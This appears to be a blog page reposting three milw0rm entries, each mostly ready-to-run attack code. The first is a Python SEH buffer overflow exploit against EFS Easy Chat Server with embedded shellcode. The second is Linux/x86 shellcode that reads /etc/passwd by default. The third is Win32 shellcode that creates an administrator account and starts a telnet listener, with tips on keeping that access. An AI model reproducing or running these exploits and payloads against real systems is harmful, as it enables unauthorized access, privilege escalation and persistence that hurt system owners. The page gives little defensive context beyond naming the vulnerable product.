EFS Easy Chat Server Authentication Request BOF Exploit (SEH)

#!/usr/bin/python
#[*] Bug : EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (SEH)
#[*] Refer : http://www.milw0rm.com/exploits/4289
#[*] Tested on : Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ)

import struct
import socket



buf = "\x41"*216
buf += "\xEB\x06\xAE\xFA" #jmp+6
buf += "\xB6\xB2\x01\x10" #universal pop pop ret
buf += "\x90"*19

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
buf+=(
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4"
"\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\xa4\x0d\xa0\xff"
"\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x84\x0c\xc0\xf3"
"\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\xa3\xcc\xe1\xb7"
"\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x80\x0c\xc0\xdc"
"\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x4f\x84\x77\x9e"
"\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x2f\x4d\x27\x31"
"\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\xa4\x0d\xa0\xd2"
"\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\xcc\xfd\xa1\xbe"
"\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\xc7\x0d\x2b\xba")

head = "GET /chat.ghp?username="+buf+"&password="+buf+"&room=1 HTTP/1.1\r\n"
head += "Host: 127.0.0.1\r\n"


s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))
s.send(head + "\r\n\r\n")
s.close()

# milw0rm
No comments:
Labels: ,

Linux/x86 file reader 65 bytes + pathname

/*
Linux/x86 file reader.

65 bytes + pathname
Author: certaindeath

Source code:
_start:
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
jmp two

one:
pop %ebx

movb $5, %al
xor %ecx, %ecx
int $0x80

mov %eax, %esi
jmp read

exit:
movb $1, %al
xor %ebx, %ebx
int $0x80

read:
mov %esi, %ebx
movb $3, %al
sub $1, %esp
lea (%esp), %ecx
movb $1, %dl
int $0x80

xor %ebx, %ebx
cmp %eax, %ebx
je exit

movb $4, %al
movb $1, %bl
movb $1, %dl
int $0x80

add $1, %esp
jmp read

two:
call one
.string "file_name"
*/
char main[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd"
"\x80\x89\xc6\xeb\x06\xb0\x01\x31"
"\xdb\xcd\x80\x89\xf3\xb0\x03\x83"
"\xec\x01\x8d\x0c\x24\xb2\x01\xcd"
"\x80\x31\xdb\x39\xc3\x74\xe6\xb0"
"\x04\xb3\x01\xb2\x01\xcd\x80\x83"
"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff"
"\xff"
"/etc/passwd"; //Put here the file path, default is /etc/passwd

# milw0rm
No comments:
Labels: ,

Win32 telnetbind by winexec 111 bytes

; payload:add admin acount & Telnet Listening
; Author: DATA_SNIPER
; size:111 bytes
; platform:WIN32/XP SP2 FR
; thanks:Arab4services team & AT4RE Team
; more info: visit my blog http://datasniper.arab4services.net
; The Sh3llcode:
; "\xEB\x08\xBA\x4D\x11\x86\x7C\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63"
; "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x68\x69\x6C\x6C\x20\x31\x32\x33\x34\x35"
; "\x36\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67"
; "\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x65\x75\x72\x73"
; "\x20\x68\x69\x6C\x6C\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x73\x63\x20\x73\x74\x61"
; "\x72\x74\x20\x54\x6C\x6E\x74\x53\x76\x72\x00"
; Description: it's simular to TCP BindShell on port 23,throught Command execution we can get shell access throught telnet service on Windows b0x.
; Add admin account command user=GAZZA ,pass=123456 :cmd /c net user GAZZA 123456 /ADD && net localgroup Administrateurs GAZZA /ADD
; Start telnet service: sc start TlntSvr
; For saving ur access to the B0x again and again :),u can use this command:
; "sc config TlntSvr start= auto & sc start TlntSvr" instead of:
; "sc start TlntSvr"
; NASM -s -fbin telnetbind.asm
BITS 32
db 0EBh,08h ;such as "jmp Data" ,i puted it in opcode format for avoiding null problem.
Exec:
MOV EDX,7C86114Dh ;WinExec addr in WIN XP SP2 FR
CALL EDX
INT3 ;just interrupter (hung the shellcode after it do his job,any way u can use ExitProcess) for avoiding infinite loop
Data:
CALL Exec
db 'cmd /c net user exploitvuln 123456 /ADD & net localgroup Administrateurs exploitvuln /ADD & sc start TlntSvr',00h
;add user exploitvuln with 123456 password and start telnet service ;BTW the exstension cuted for saving som byte ;)

#milw0rm
No comments:
Labels: , ,
Subscribe to: Comments (Atom)